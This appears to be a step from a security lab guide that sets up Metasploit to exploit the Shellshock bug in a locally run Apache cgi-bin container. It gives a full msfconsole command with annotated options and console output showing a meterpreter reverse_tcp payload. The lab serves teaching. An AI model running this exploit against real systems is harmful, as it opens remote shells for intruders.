Metasploit Setup

To create a metasploit terminal within your code-server instance, follow these instructions

We are going to run metasploit as a non-root user in another terminal which we’ll refer to as Terminal 2 in the tabs below. If you haven’t already, you can split your terminal to open a new, non-root, shell

Figure 1. Terminal Split button

Then run the following commands in the newly created terminal:

Terminal 2

Start up metasploit in your terminal by running the following command:

msfconsole \
    -x \(1)
"use multi/http/apache_mod_cgi_bash_env_exec; (2)
set RHOST 127.0.0.1; (3)
set RPORT 8081; (4)
set LHOST $(dig +short myip.opendns.com @resolver1.opendns.com); (5)
set targeturi /cgi-bin/log-visitor.sh" (6)

1	The `-x` option allows us to pass commands directly into metasploit (see following explanations of each). We use this to save setup time
2	This is a metasploit module that plugs into the console. There is a whole library of modules that are used with metasploit. This one specifically targets the shellshock vulnerability via Apache’s cgi-bin support
3	This is the address of the server (which we’re running locally in a container)
4	The port the container is listening on (in our case the port that is forwarded to the container via the `-p` option to `podman run`)
5	The public ip address of the VM instance (as reported by `dig`). This is necessary for how metasploit works
6	The target URL of a cgi-bin script. Those that are astute might recognize this as the cgi-bin endpoint of the guestbook page (`hello.html`)

NOTE

If asked if you want to setup a new database, answer no

Would you like to use and setup a new database (recommended)?

When it’s done initializing, you should see output something like this (ASCII art, "tip", and LHOST will vary)

** Metasploit Framework Initial Setup Complete **

[!] The following modules could not be loaded!../
[!]     /opt/metasploit-framework/embedded/framework/modules/auxiliary/gather/office365userenum.py
[!] Please see /home/student1/.msf4/logs/framework.log for details.

                          ########                  #
                      #################            #
                   ######################         #
                  #########################      #
                ############################
               ##############################
               ###############################
              ###############################
              ##############################
                              #    ########   #
                 ##        ###        ####   ##
                                      ###   ###
                                    ####   ###
               ####          ##########   ####
               #######################   ####
                 ####################   ####
                  ##################  ####
                    ############      ##
                       ########        ###
                      #########        #####
                    ############      ######
                   ########      #########
                     #####       ########
                       ###       #########
                      ######    ############
                     #######################
                     #   #   ###  #   #   ##
                     ########################
                      ##     ##   ##     ##
                            https://metasploit.com


       =[ metasploit v6.0.47-dev-                         ]
+ -- --=[ 2135 exploits - 1138 auxiliary - 365 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 8 evasion                                       ]

Metasploit tip: When in a module, use back to go
back to the top level prompt

[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
RHOST => 127.0.0.1
RPORT => 8081
LHOST => 54.79.241.48
targeturi => /cgi-bin/log-visitor.sh
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) >

Now you can close this window and go back to the lab instructions.